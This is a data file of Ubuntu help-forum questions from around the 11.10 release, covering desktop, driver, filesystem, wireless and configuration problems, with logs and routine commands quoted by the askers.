71926	resetting compizconfig settings manager settings	i was running 11.04 before upgrading to 11.10 recently and now i am not able to access my account . when i try to login , the console flashes up with some messages on it , then the nvidia logo pops up and then it takes me back to the login screen . i have a latitude e6500 . i believe the issue stems from here : when using 11.04 i tried to get the cube working on compiz against others recommendations . eventually i hosed my ccsm settings and was not able to login to the account anymore without changing to ubuntu classic on the login menu . now that ubuntu classic is gone in 11.10 i 'm only able to login through the guest account ( to see a desktop at least , terminal is still fine ) . i believe if i can reset my ccsm settings back to default through the terminal while logged into my main account that would fix it . any ideas ?
71928	terminal randomly disappears from alt-tab list , unity launcher .	i like the terminal , it 's handy to have open but this happens eveytime : open terminal type something in it switch to another program terminal is closed : -/ this happens even if i just type something in the command line and leave it there , or if i open a program through the command line or if i 'm just looking through my folders ... edit sorry this is the true chain of events : list item open terminal switch to another program alt-tab does n't display it click on terminal in the task bar opens new terminal
71932	unable to connect to wireless router using intel pro/wireless 3945abg	a few days ago i upgraded to 10.10 and since then i 've been unable to connect to my wireless router . networkmanager tries to connect to the router - the animated `` connecting '' symbol stays for a few seconds - but then the connection breaks off . i did the usual : restarted the router , deleted and recreated the wireless connection , tried to connect manually by the command line , checked that the connection works with other pcs , etc . without any success . while the connection is attempted , the router lists my computer as connected - right until the moment it breaks off again . i can only guess that some of the drivers changed . any ideas ? i will be happy to provide additional information if required . i 'm using an intel corporation pro/wireless 3945abg . lsmod names the drivers as : iwl3945 83391 0 iwl_legacy 83487 1 iwl3945 mac80211 310872 2 iwl3945 , iwl_legacy cfg80211 199587 3 iwl3945 , iwl_legacy , mac80211 and every connection attempt creates the following messages in dmesg [ 2763.948180 ] wlan0 : authenticate with 00:1a:2b:50 : e4 : be ( try 1 ) [ 2763.950114 ] wlan0 : authenticated [ 2763.950646 ] wlan0 : associate with 00:1a:2b:50 : e4 : be ( try 1 ) [ 2763.952919 ] wlan0 : rx reassocresp from 00:1a:2b:50 : e4 : be ( capab=0x11 status=0 aid=3 ) [ 2763.952928 ] wlan0 : associated [ 2774.616071 ] wlan0 : no ipv6 routers present [ 2784.207748 ] wlan0 : deauthenticating from 00:1a:2b:50 : e4 : be by local choice ( reason=3 ) [ 2784.221101 ] cfg80211 : all devices are disconnected , going to restore regulatory settings [ 2784.221115 ] cfg80211 : restoring regulatory settings [ 2784.221125 ] cfg80211 : calling crda to update world regulatory domain [ 2784.230918 ] cfg80211 : ignoring regulatory request set by core since the driver uses its own custom regulatory domain [ 2784.230928 ] cfg80211 : world regulatory domain updated : [ 2784.230932 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 2784.230941 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 2784.230949 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 2784.230956 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 2784.230963 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 2784.230970 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) update : following marius gedminas advice , i took a look at /var/log/syslog . here the most interesting of the generated lines : oct 25 22:16:15 loli dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 13 oct 25 22:16:22 loli networkmanager [ 813 ] : < info > ( wlan0 ) : ip6 addrconf timed out or failed . oct 25 22:16:22 loli networkmanager [ 813 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ip6 configure timeout ) scheduled ... oct 25 22:16:22 loli networkmanager [ 813 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ip6 configure timeout ) started ... oct 25 22:16:22 loli networkmanager [ 813 ] : < info > activation ( wlan0 ) stage 5 of 5 ( ip configure commit ) started ... oct 25 22:16:22 loli networkmanager [ 813 ] : < info > activation ( wlan0 ) stage 5 of 5 ( ip configure commit ) failed ( no ip configuration found ) oct 25 22:16:22 loli networkmanager [ 813 ] : < info > ( wlan0 ) : device state change : ip-config - > failed ( reason 'ip-config-unavailable ' ) [ 70 120 5 ] oct 25 22:16:22 loli networkmanager [ 813 ] : < warn > activation ( wlan0 ) failed for access point ( jazztel_1b ) oct 25 22:16:22 loli networkmanager [ 813 ] : < info > marking connection 'jazztel_1b ' invalid . oct 25 22:16:22 loli networkmanager [ 813 ] : < warn > activation ( wlan0 ) failed . oct 25 22:16:22 loli networkmanager [ 813 ] : < info > activation ( wlan0 ) stage 5 of 5 ( ip configure commit ) complete . oct 25 22:16:22 loli networkmanager [ 813 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ip6 configure timeout ) complete . oct 25 22:16:22 loli networkmanager [ 813 ] : < info > ( wlan0 ) : device state change : failed - > disconnected ( reason 'none ' ) [ 120 30 0 ] oct 25 22:16:22 loli networkmanager [ 813 ] : < info > ( wlan0 ) : deactivating device ( reason 'none ' ) [ 0 ] oct 25 22:16:22 loli networkmanager [ 813 ] : < info > ( wlan0 ) : canceled dhcp transaction , dhcp client pid 1996 oct 25 22:16:22 loli kernel : [ 420.207436 ] wlan0 : deauthenticating from 00:1a:2b:50 : e4 : be by local choice ( reason=3 ) the problem seems to be the ipv4 configuration . in my wireless settings for the access point , the `` ipv4 configuration required '' box is ticked . subsequently i tried to connect with a static ip - which worked fine . that way i can connect to the network , only that i canâ´t access the internet nor the router . can it be , that the problem resides somewhere with the dhcp discover and not with the wireless drivers ?
71934	can i identify encrypted files resulting in dmesg errors , or fsck the encrypted files ?	a few days ago , i accidentally ran out of space in my encrypted ( ecryptfs ) home folder after upgrading to oneiric ( tracker went nuts ) . i noticed because i could n't write my files with vim anymore , and one actually got zeroed-out . however , the problem is that now i 'm seeing errors in my dmesg : [ 4243.291883 ] valid ecryptfs headers not found in file header region or xattr region [ 4243.291888 ] either the lower file is not in a valid ecryptfs format , or the key could not be retrieved . plaintext passthrough mode is not enabled ; returning -eio so my questions are : should i be really concerned about these messages ? is there any way to identify which files are the cause of these errors ? alternatively , is there any way to do a check of the entire ecryptfs folder to check for inconsistencies ? thanks .
71935	support for realtek8111e	putting realtek 8111e support into 11.10 requires an unreasonable amount of work if one only wants a 'live ' cd to evaluate ubuntu . since linux is worthless without the internet , i ca n't even evaluate it until 8111e suport is included .
71937	how do i disable the app menu at the user level ?	i 'm trying to disable the app menu feature ( which drops all applications menu to the top panel ) on ubuntu 11.10 . two solutions found up to now : sudo apt-get autoremove appmenu-gtk appmenu-gtk3 appmenu-qt or echo `` export ubuntu_menuproxy=0 '' | sudo tee /etc/x11/xsession.d/81ubuntumenuproxy both are system wide solutions . how could i set it in the user environment ? i tried to set it in ~/.xprofile ... without success . thanks ,
71943	how do i disable a keyboard shortcut without compiz-manager ?	how can i disable a shortcut ( ctrl + lmb ) in ubuntu 11.10 without the compiz-manager ? the compiz-manager destroys my desktop therefore i can not use it . is there a config file where i can disable this shortcut instead ?
71944	ubuntu 11.10 btrfs errors after every reboot	i installed a new system when oneiric was released i am also using gnome classic and have the following layout : /dev/sda3 on / type btrfs ( rw , noatime , relatime , subvol= @ ) /dev/sda3 on /home type btrfs ( rw , noatime , relatime , subvol= @ home ) /dev/sda2 on /boot type ext4 ( rw , noatime , relatime , commit=0 ) the machine is a thinkpad 410s ( ssd , 8gb of ram , i5 , integrated video card ) every time i reboot ( gracefully ) it looks like the btrfs has to be checked ( there are a lot of reads or writes going on ) and it says it found errors then looks like it corrects them and then goes on with the boot . any idea where can i look to know what is going on ? anybody knows of a known bug in the conditions i am describing or something similar ? i want to troubleshoot it but i do not know where to start looking .
71945	gnome shell without the application dashboard ( like unity )	i 've just installed gnome-themes-default and enabled gnome-shell on my ubuntu 11.10 but i ca n't see those fancy windows/application dashboards ( of gnome 3 ) like unity had . can someone tell me what to do or install ? maybe some problem with lightdm or gdm ?
71950	compizconfig killed unity , only unity2d works now	i went into compizconfig settings manager to disable a setting in the grid plugin ( snap windows back to original size . ) as soon as i checked it off , the screen flickered for a moment , the launcher disappeared , all windows lost their borders and clicking on them did nothing . whenever i try to log into that account on regular unity , i either see my desktop and nothing else , or my desktop along with the taskbar up top with nautilus 's menus . ( i ca n't provide screenshots ; printscreen button does nothing . ) if i open a window with the nautilus menu , it has no borders , and i ca n't click on anything . the only way i 've found to interact with anything in this state is to bring up the virtual terminal with ctrl+alt+f1 , but i have no clue how to fix anything from there . i can still log into unity on all other accounts , and i can still use unity2d on the affected account . how do i get unity up and running again ? thanks .
71957	wo n't boot unless plugged in ?	i have a laptop which , last night i repaired the power jack and now it works . i installed ubuntu last night and it was working fine , this morning i unplugged it and turned it on and it would not boot linux , the startup music / noise would happen but the screen would lock up i 'm going to take pictures of the many different unresponsive screens but the most memorable is a black background with 4 or 5 white boxes ( like qrcodes ) on the screen . when i plugged the laptop back in i saw this screen again for a fraction of a second then it booted . any idea on how to fix this ? the laptop is a an acer extensa 4420 if that matters . i just unplugged it after i wrote this initial post and it completely froze and was unresponsive on the desktop . youtube video initial run of dmesg = > http : //pastebin.com/7wyyphvw removal of quiet splash from grub reboot dmesg = > http : //pastebin.com/lajlm31i updated dmesg = > http : //pastebin.com/jsrxxs4y fsck output = > http : //pastebin.com/wnwcix93 kernel update dmesg = > http : //pastebin.com/tebxt8rv
71958	2000+ processor wake ups.. ?	i have dell xps 15 with nvidia 525 with optimus . i use ironhide for optimus support . under normal conditions i can see 2000+ processor wake ups . as a result of which my battery dries up rapidly . in windows i get almost 4 hours back up and in ubuntu i hardly get 2+ hours battery backup . i 'm not able to identify what the problem is . i 'm using ubuntu 11.10 32-bit . please help to resolve my issue . thank you
71962	canoscan lide 110 driver for ubuntu ? how to scan via command line ?	canoscan lide 110 is connected to my ubuntu 11.04 . i need to scan remotely using the command line . how can i use the scanner from the command line ? tried/failed/succeed : $ apt-get install sane sane-utils $ scanimage scanimage : no sane devices found $ scanadf scanadf : no sane devices found $ sane-find-scanner failed ... over and over to find the correct one.. ( very strange ) $ dmesg now found something ... ( after waiting a lot ) $ scanimage -l device `genesys : libusb:001:018 ' is a canon lide 110 flatbed scanner $ scanimage -x 100 -y 100 -- format=tiff > /tmp/scanbabyscan.tiff $ file /tmp/test.tiff /tmp/test.tiff : tiff image data , big-endian # ll /tmp/test.tiff -rw-r -- r -- 1 root root 1393802 2011-10-25 20:09 /tmp/test.tiff follow up : what is what : ppm = color pbm = black and white pgm = gray how do i use it show me some examples : scanimage -d umax : /dev/sgb -- resolution 72 -x 200 -y 100 > scan.ppm |______________| |_____________| device dpi 72,120,300,600 scanimage -- mode=color > /tmp/test.tiff |__________| color
71970	error when trying to sync ipod touch	i have been trying to get my ipod touch to sync on ubuntu 10.10 . every time i plug my ipod in my computer this error come up and says `` unhandeled lockdown error-4 '' i use ios 5 and i still ca n't get it to work . what can i do ?
71972	how do i inhibit suspend from the command line ?	is there a way to inhibit suspend/hibernate from the command line . i want to ssh into my home computer and not have it suspend while i 'm working on it .
71982	factory reset for ubuntu 11.10 to really uninstall wine	is there a way to do a reset for ubuntu 11.10 to really uninstall a software such as wine and all of its remaining components . i installed wine 1.3 using these commands : sudo add-apt-repository ppa : ubuntu-wine/ppa sudo apt-get update sudo apt-get install wine1.3 then i used the software center to uninstall wine but that really did n't uninstalled the whole program because it left some folders in the home directory .wine so is there a way to reset ubuntu or really uninstall wine with terminal commands ? can you guys please help with the code for the terminal .
71990	how can i get kupfer to respond to keystrokes ?	kupfer is a keyboard-oriented program , so it 's strange that it suddenly wo n't respond to any key commands . once i summon it , the window pops up , but nothing i type has any effect .
71991	how to run script at shutdown ?	how can i make a bash script run only at shutdown ? i have searched for it and keep coming up empty handed . i would be fine with either a link or an explanation to how to do it .
71992	bad sound in wine	i know this is a bug that probably will be fixed in a later version of wine 1.3x . but i was hoping if there is a way to tweak of edit the current version if i have this problem again ( i still have it ) . at first everything was working perfectly , but then after 10 minutes i got a bad sound . i still get the bad sound and it 's not localized to a specific application it 's also in the wine test sound function . wine version : wine-1.3.31 i have the winealsa driver . it 's a new interface and all the old fixes does n't work . in the default selesctions you can choose default , system deafult or hdmi ( external ) .
71995	rotate second monitor with nvidia	i have two monitors the left/primary is aligned horizontally but the right/secondary is aligned vertically . when i first installed , i set this up without problem using the display settings . but when i installed the nvidia driver , i can no longer rotate the second monitor . i looked into the nvidia x server settings but i do n't see any option to rotate the display and when i look at the display settings , it only sees one large `` unknown '' monitor . os : linux-x86_64 ( ubuntu 11.10 ) gpu : nvidia nvs 290 nvidia drivers : version : current
72001	how do i install indicator-keylock ?	does someone know if there is a caps lock indicator for 11.10 . i am used to using `` indicator-keylock '' in 11.04 . i have added the repository but appears is not supported in 11.10 . package indicator-keylock is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source
72002	usb sata hard drive enclosure	i 'm trying to use a usb to sata hard drive enclosure on 10.10 . it shows up in the file manager , but i can not open it or anything else . is there a driver i need or some other configuration i must do to see it work ? its a rosewill external enclosure if that matters at all .
72003	how do i resolve a grub : âinvalid arch independent elf magicâ error ?	i am stuck with a rather irritating problem i ran into after installing 11.10 on my macbook pro 5,5 . i did a clean install efi booting into the setup using the desktop cd . upon the first reboot i was presented with the `` invalid arch independent elf magic '' and grubs rescue console . i have read grub : `` invalid arch independent elf magic '' after natty install on ssd but the solution is no solution for me since installing grub via live cd only means installing the mbr version and i ca n't seem to find any manual on how to install grub-efi while booted into the live cd . so my question is : how can i either edit the grubx64.efi file in my efi partition , reinstall grub-efi with a live cd / dvd or use grub rescue commands to fix this issue ?
72004	change ubuntu via hard-drive	so im looking to re-install my ubuntu ( 11.10 ) hopefully via a hard-drive as i lazily updated via the update manager and my laptop isnt the same . the main problems are cd drive doesnt work even when choosing to boot from bios ( think the laser may have gone ) and none of the programs work like startup disc creator , update manager etc . when i click on them nothing comes up sometimes i get asked to put in my password and then nothing . so really my option to reinstall seems to be via a hard-drive or some other method i dont know about . any help is much appreciated .
72006	why is 11.10 being worked on faster than previous releases	i have noticed since i install ubuntu 11.10 that updates keep coming every 1 or 2 days . not just normal 1mb or less updates but some like 20mb , 40mb , 50mb . just to add i always activate all the repositories ( universe , multiverse ... ) and only add the winehq ppa . i have used ubuntu since 5.04 and started studying how frequently updates come since 9.10 . typically , updates came almost once a week and they were between 100kb to 25mb . sometimes to get to 30mb it would have to passed 2 weeks at least . i have to say ubuntu 11.10 in less than a month has received more than 200 updates which is a lot in comparison to 11.04 , 10.10 or 10.04 . at least in my case all bugs i tried to report were either solved the next day or before the end of the week ( sharing network , launcher bugs , video bugs , calendar bugs ... ) . so i wonder why is 11.10 being worked on so much faster ( and efficient ) and why . does it involve using it as base for 12.04 , will this type of development continue with future versions , will something big in the future come to surprise the ubuntu community ?
72008	hardware mac address change using live cd ?	i would like to save a new mac to the hardware , so i can use the new mac address on windows . i am using live cd of the newest ubuntu . if i try ifconfig it does n't save it for my windows system . i do n't have admin permissions on windows . i need to change mac address so the windows one changes too .
72010	why did my fullscreen graphical performance decrease with unity 3d ?	i updated to 11.10 and urban terror now seems very laggy in fullscreen mode when i 'm using unity 3d ( sync to vblank is disabled ) . in unity 2d i get good performance , but when i was using 11.04 i had great performance on unity 3d as well . why has this changed on 11.10 ? i like unity 3d more and i do n't want to log out and switch to 2d just to get good performance on games . my graphics card is an hd 4250 and i have the drivers installed .
72013	command to determine whether ubuntu is running in a virtual machine ?	is there a command or tool that can be used to determine whether ubuntu is running as a guest within a virtualization program such as virtualbox or qemu or whether it is running on the bare metal ?
72014	graphics driver installation failure	i have updated my amd athlon computer with ubuntu 11.04 to ubuntu 11.10 , and the installation was successful . the computer was working smoothly . but when i installed the graphics driver it had suggested to me , the next time i booted it did not work . the screen resolution of the initial login screen was off , and once i had logged in it had a very , very small resolution , and the display was all distorted . much of the menubar was broken and everything in general looked distorted also . it after a few minutes went into a screen that checked my battery and other things , and then turned off . now when i turn on the computer i more often than not get a failed login screen that can not display many of the components of the login screen . i am a newbie to using ubuntu so sorry if this is a stupid question . thanks for your help in advance : d edit : these pictures show some of the login screen errors : ( under gde login option )
72017	where is force quit ?	i 'm trying to make a custom launcher in 11.10 for the special force quit launcher we had in 11.04 ( you could add it from the list of apps , but now it is nowhere to be found , even in alacarte .. ) .. so i try using infos from here but i have no idea what the actual file or command is for force quit nor where it is in the filesystem.. this question is real specific to force quit itself and is not about asking how to create a launcher .. i will create a file called forcequit.desktop and put it in ~/.local/share/applications folder and will then drag it unto the toolbar like it is told elsewhere . the content of the file will look like this : # ! /usr/bin/env xdg-open [ desktop entry ] version=1.0 type=application terminal=false exec=sh -c 'notify-send `` click on an application to force-close it , or press esc to cancel . `` ; xkill' name=force quit comment=click on the app to quit with your pointer icon=gnome-panel-force-quit categories=system , accessories ; i suppose it might be a special command that takes an argument , again if you have the info please do tell : ) i wrote comments in the file about the infos i need.. edit : ok now it works with showing a special x icon and does force quit properly.. now i just need to find out how to get instructions to appear for an end user , just like it does when using from cli.. i 'd suppose it displays the launcher 's comment on screen somewhere ? any ideas or links ? or maybe i need to add something to this launcher file ? last edit : well the solution from the above edit has been found , it is the usage of notify send that does the trick ..like it is now reflected in the code .. enjoy the solution for your desktop ( or for end users you support ! ) lastest edit : all this talk makes me want to go look for notify-send options a little more..and well in a greater scale at all the other commands i can use ... ..notify-send is part of gnome is it ? or is it part of sh ? ( i doubt it 's from sh ) edit to the lastest edit : nevermind that.. i found an answer to that as well.. notify-send is part of the libnotify library package..and notify-send is in the tools folder ( i had trouble finding it at first.. ) and no it isnt specifically part of gnome , but rather another library used by many apps : )
72023	why are letters overlapping in the terminal ?	i installed oneiric as a guest os in virtualbox using the mini cd . i installed the ubuntu-desktop package and everything seems to work fine - well , except for a font issue with the terminal : as you can see , some of the letters overlap and it 's difficult to read . i checked the settings and it the checkbox `` use the system fixed width font '' is checked with `` monospace | 12 '' selected underneath it . edit : running the commands mentioned in the comments : $ fc-match `` monospace '' dejavusansmono.ttf : `` dejavu sans mono '' `` book '' $ gconftool -- get /desktop/gnome/interface/monospace_font_name monospace 10 $ debsums ttf-dejavu-core /usr/share/doc/ttf-dejavu-core/authors ok /usr/share/doc/ttf-dejavu-core/bugs ok /usr/share/doc/ttf-dejavu-core/news.gz ok /usr/share/doc/ttf-dejavu-core/readme ok /usr/share/doc/ttf-dejavu-core/changelog.debian.gz ok /usr/share/doc/ttf-dejavu-core/copyright ok /usr/share/doc/ttf-dejavu-core/langcover.txt.gz ok /usr/share/doc/ttf-dejavu-core/status.txt.gz ok /usr/share/doc/ttf-dejavu-core/unicover.txt.gz ok /usr/share/fonts/truetype/ttf-dejavu/dejavusans-bold.ttf ok /usr/share/fonts/truetype/ttf-dejavu/dejavusans.ttf ok /usr/share/fonts/truetype/ttf-dejavu/dejavusansmono-bold.ttf ok /usr/share/fonts/truetype/ttf-dejavu/dejavusansmono.ttf ok /usr/share/fonts/truetype/ttf-dejavu/dejavuserif-bold.ttf ok /usr/share/fonts/truetype/ttf-dejavu/dejavuserif.ttf ok
72025	how can i make an existing persistant live usb installation load more of the os to ram ?	a while back i installed ( a permanent installation , not a live usb ) ubuntu on my usb thumb drive . unfortunately , the transfer rates are too slow for a smooth and responsive experience , so i 'd like to load more of the os into ram when it boots up , kind of like a live usb . the problem is that while a typical live usb created from the standard desktop .iso will probably fit in 2 gb of ram when the os ( /casper/filesystem.squashfs ? ) is fully uncompressed and loaded , my installation is nearly 5 gb in size , and my computer only has 2gb of ram . however , much of the installation consists of texlive packages and other files which i definitely use , but use rarely . in reality , the commonly used apps and files are so little that their total size could probably fit in ram easily . is it possible to modify my already existing ( permanent ) ubuntu installation on a usb thumb drive such that i can specify which folders should load to ram ( and which ones can be excluded ) , as i do n't believe i can fit the whole os into 2gb of ram . i mainly want my browser , shell , and common shell commands to be fast . /home is not very important when it comes to performance . i 've partitioned the usb drive as follows , if it helps : boot ( /boot ) root ( / ) home partition ( /home ) swap also , i 've taken a look at a boot to ram page on the ubuntu website , but the focus there seems to be for customizing a livecd image .
72027	controlling phonon via command line ?	my onboard audio card has analogue and digital outputs parallel , where i do connect them to my speakers and an amplifier . now every time i want to switch where the sound goes i have to long way via kmix to reach phonon configuration : settings - > audio setup - > audio hardware setup and then choose proper sound card and profile ( and sometimes optionally sound device and connector ) . is there any way how i could do this via command line ? i want write me a script , but not sure through which utility i can control these settings ?
72033	how to show disk usage of a package including dependencies ?	i 'm using aptitude as package manager . if one marks packages for removal it calculates the changing in disk usage , i.e . how much space is freed by removing that package and its automatically installed , otherwise unused dependencies . is there a way ( not necessarily within aptitude ) to get this number for , say , all packages marked manually installed ?
72037	how do i get the system menus to stay open on click ?	this is new since upgrade to 11.10 , now when i click the system menus for notification icons , logged in user , etc on the top right , they do n't stay open , they just close immediately . application menus on the top right do stay open correctly once clicked . this is pretty inconsistent an awful , so how do i fix it ? : )
72038	wifi is not enabled in network manager with a bcm4313	help please . put it on the computer ubuntu 11.10 64bit . used the response in the topic wifi does not work , broadcom sta wireless driver does not work on a bcm4313 but this does not help . computer lenovo z570 , wifi card broadcom corporation bcm4313 when choosing network manager > enable wireless nothing happens . wifi not enabling .
72039	all of my icons appear blank . how can i change them back ?	i installed the new 11.10 oneiric ocelot ubuntu version , and i am very happy with it , but today i had a problem that i dont know how to solve . the icons of the directories have changed , look at this : as you can see , the icons have white papers , and not their original one .
72042	how can i enable themes in gnome shell ?	i have installed the `` gnome shell theming extension '' . i have enabled it in the `` gnome tweak tool '' i have installed some themes in my ~/.themes folder but still i can not select any shell-theme . how can i enable and select gnome shell themes in 11.10 ?
72043	audio preview gone ?	there used to be the fantastic feature in nautilus that allowed you to hear a music file if the cursor hovered over it for a second . this seems to have been taken out . i do n't know if it 's a nautilus thing or an ubuntu thing or even a gnome3 thing . someone seems to have cut it . going into the file manager - edit - preferences - preview -- only shows me `` text files '' , `` other previewable files '' , and `` folders '' . none of these has a `` sound '' option . i 've read `` fixes '' that include installing mpg321 and checking the `` sound section '' . nothing seems to work . this feature is brilliant and i want it back ! when i 'm making noise collages in audacity for the theater - it 's so helpful to go through my sound library by just hovering over the files . i do n't have to `` right click - open with '' and wait for 7 seconds until some audio player opens the tracks . if we 're talking `` productivity '' here then this feature must come back ! the question is `` who ditched it ? '' nautilus , ubuntu , or gnome3 ? anyboby got any ideas how to get it back ? is there something other than mpg321 that i can install ?
72046	do i need a dedicated graphic card to run some software virtualized ?	do i need a dedicated graphic card if i want to run softwares such as matlab , photoshop , etc on virtualbox in ubuntu.does intel 's integrated graphic card is enough or not ? i plan to have a 8 or 6gb ram with intel i7 quad core processor.please post your results if have used before . what i need to know is there will be an performence boost using a dedicated graphic card while working with virtualized environment ?
72053	system hangs after second time suspending	i installed a new system when oneiric was released i am also using gnome classic and have the following layout : /dev/sda3 on / type btrfs ( rw , noatime , relatime , subvol= @ ) /dev/sda3 on /home type btrfs ( rw , noatime , relatime , subvol= @ home ) /dev/sda2 on /boot type ext4 ( rw , noatime , relatime , commit=0 ) the machine is a thinkpad 410s ( ssd , 8gb of ram , i5 , integrated video card ) when i close the lid and suspends it does it right the first time , but the second time it kind of hangs and i have to keep the power button pressed to turn it off to be able to keep using it , i.e . i have to reboot the machine . any idea where can i look to know what is going on ? anybody knows of a known bug in the conditions i am describing or something similar ? i want to troubleshoot it but i do not know where to start looking .
72055	compiz and drag behavior after `` snapping ''	big question.. does anybody has problems while dragging a snapped window from the corners ( aero-snap-style ? ) i have this very very annoying problem ..and also some comparable problems with dragging in the expo view.. at the second click to a window to drag it moves exponentially to the mouse .
72056	mount with virtualbox erased home directory ?	i have a new ( ish ) installation of ubuntu in a virtualbox , with osx as a host machine . i was attempting to mount a shared folder into ubuntu , so typed in the terminal : sudo mount -t vboxsf vbshare ~/ ... or similar , expecting to mount the folder in my home . however , what appears to have happened is that the folder has replaced my home folder , which now just contains the files from the shared folder . ( there is a chance i also tried something like : sudo mount -t vboxsf vbshare /home/michael/ ) what has happened ? is recovery a possibility ? what should i have done instead ? i have n't tried a restart yet ...
72064	.xmodmap works only when automatic login disabled ?	i configured .xmodmap after the answer i got here : how to set right alt to work as a win ( super ) key ? it sets my r alt to super key . it worked after log out and log in . when i restarted the pc , the key has stopped working . i run xev , the system reported state 0x0 , keycode 108 ( keysym 0xffec , super_r ) , same_screen yes that this is superr but the key was working as altr . running manually xmodmap .xmodmap filed an error that there is no altr . after login aginn the altr works as expected , with the same stanza as above , but working key ... i disabled auto login and the configuration started to work as wanted . any ideas how to fix that , it seems to configuration fully works only f login screen was present . ps i was never asked if i want to keep the custom configuration after login .
72065	does thunderbird ubuntu one contacts sync work in 11.10 ?	i have just installed ubuntu 11.10 and am trying to get my contacts in thunderbird to sync to ubuntu one . i thought it would just be a case of saving them in the ubuntu one address book , which i have done , but these contacts do not appear in the ubuntu one web portal . neither do the contacts that i already have existing in ubuntu one ( from an old experiment with evolution ) get pulled down to the address book . the ubuntu one console shows that contacts sync is enabled and i ca n't find anywhere else that i might be able to configure anything to do with this . everything else in ubuntu one seems to be working fine with this machine . can anyone confirm if this actually works and if so , how to go about setting it up
72068	is there an alternative to the default lock-screen ?	i have a tablet pc that i 'm running oneric on . one thing i do n't like is that the default lock screen requires you to enter a password . since this is a tablet , this means that it either needs to be connected to a keyboard , or i have to figure out how to get onboard to show up for the lock screen ( caribou wont even start , and gok is messed up too ) . even if i could do that , anyway , it 's not what i want , since locking the screen is mostly to prevent erroneous input when i 'm carrying it around ( not for security ) . are there any alternative applications for the lock screen ? anything like the plethora of android lock screens that allow you to solve puzzles or push a particular widget in a particular way to unlock the screen ?
72070	how do i change dconf keys without a gui ( for a post-install script ) ?	i have installed dconf-tools . in this case i am manipulating the display of a name in the panel on the session indicator . i can change this in dconf-editor gui with no problem , i go to apps/indicator-session , and untick show-real-name-on-panel . however , i have also tried to toggle it just using dconf at the command line : dconf write /com/canonical/indicator/session/show-real-name-on-panel false after rebooting , the panel is unchanged , and the key in the dconf-editor is unchanged as well . moreover , trying to update the dconf database via the terminal yields an error : $ dconf update fatal : error opening directory '/etc/dconf/db ' : no such file or directory from my experience it seems as though dconf and dconf-editor have no relationship , so i just wonder what i am doing wrong . if i can get this figured out , i want to just place the command in a bash script to run the next time i have to do a clean install for an upgrade* . i do a lot of tweaks in 6 months and i just want to automate as much as possible from now on . slightly off-topic : the distribution upgrade mechanism has never worked without a hitch for me ; i tried it going from 11.04 to 11.10 as well .
72073	check the amount of ram on the server	is there a way to check a server ( without opening it up and physically looking ) at the amount of ram that is in the box in terms of how many slots are free . also i need to know how much ram it could possibly take ? i know i can check /proc/meminfo for the ram but i 'm really more concerned with the type of ram how many slots are free/taken . i.e . i need to know how much ram i can add and what type to add to a particular but have no idea how to go about doing so .
72074	i 'm getting an odd crash on boot after upgrading	hi i have seen all the other questions on here about not being able to boot after upgrading form 11.04 to 11.10 but all the things suggestion in them ( other than a complete reinstall ) has not helped . my issue does however seem to be a bit different to the other reports . so when i boot normally and leave the system alone i get to `` checking battery '' and the system appears to crash . i can log in to recovery mode but there no errors in any of them . this is the odd bit . while booting if i go to tty1 i.e ctrl+alt+f1 while the system is booting then the system boots fine and start x with no issues . i have been able to do this repeatedly and i have no issue booting but if i do n't go to tty1 then it will never boot and always crashes at the checking battery stage . any ideas would be very helpful as this is very annoying .
72077	how do i control window placement in kde with keyboard ?	is it possible in kde to set up keyboard shortcuts similar to what unity uses for window placement - i.e . alt - ctrl - numpad 6 to make a window occupy the left half of the screen etc . ?
72078	maya 2011 crashes when opening any file	by using the instructions here http : //etoia.free.fr/ ? p=1611 i was able to install maya 2011 on ubuntu 11.10 , and got it to accept my network license and boot up . however , if i try to create a new scene , or load any file ( scene or .obj ) , i get a signal 11 crash to desktop . the last thing in maya 's log in tmp is connectattr `` renderlayermanager.rlmi [ 0 ] '' `` defaultrenderlayer.rlid '' ; with no obvious error messages . has anyone else experienced this problem ? what is the fix ? do you have any advice how to go about debugging it ? edit : here is the backtrace from gdb : # 0 0x00007fffec9790c6 in ? ? ( ) from /usr/lib/nvidia-173-updates/libgl.so.1 # 1 0x00007fffec97921b in ? ? ( ) from /usr/lib/nvidia-173-updates/libgl.so.1 # 2 0x00007fffec97b46b in ? ? ( ) from /usr/lib/nvidia-173-updates/libgl.so.1 # 3 0x00007ffff0cec9a5 in glframebuffer : :createoffscreen ( windowwrapper const & , awbufferformat const & , unsigned int , unsigned int , bool ) ( ) from /usr/autodesk/maya2011-x64/lib/libhwgl.so # 4 0x00007ffff0a74101 in oglrenderbackend : :createcontext ( windowwrapper const & , awbufferformat const & , bool , unsigned int , unsigned int , bool ) ( ) from /usr/autodesk/maya2011-x64/lib/libhwrender.so # 5 0x00007ffff0a7849a in oglrenderbackend : :swatchcontext ( unsigned int & , unsigned int & , void* ) ( ) from /usr/autodesk/maya2011-x64/lib/libhwrender.so # 6 0x00007ffff0828008 in thwtexturemanager : :removeobservers ( ) ( ) from /usr/autodesk/maya2011-x64/lib/libhwrendermaya.so # 7 0x00007ffff25c7942 in tglobaltranslator : :calldefaultcallbacks ( tglobaltranslator : :taddcallbackmode ) ( ) from /usr/autodesk/maya2011-x64/lib/libshared.so # 8 0x00007ffff2590eab in tsceneoperator : :resetscene ( ) ( ) from /usr/autodesk/maya2011-x64/lib/libshared.so # 9 0x00007ffff259200f in tsceneoperator : :newscene ( bool ) ( ) from /usr/autodesk/maya2011-x64/lib/libshared.so # 10 0x00007ffff2589a03 in tfilecmd : :handlefilenewflag ( targdatabase & , tscenefile* ) ( ) from /usr/autodesk/maya2011-x64/lib/libshared.so switching to nvidia-current instead of nvidia-173-updates does n't solve the problem .
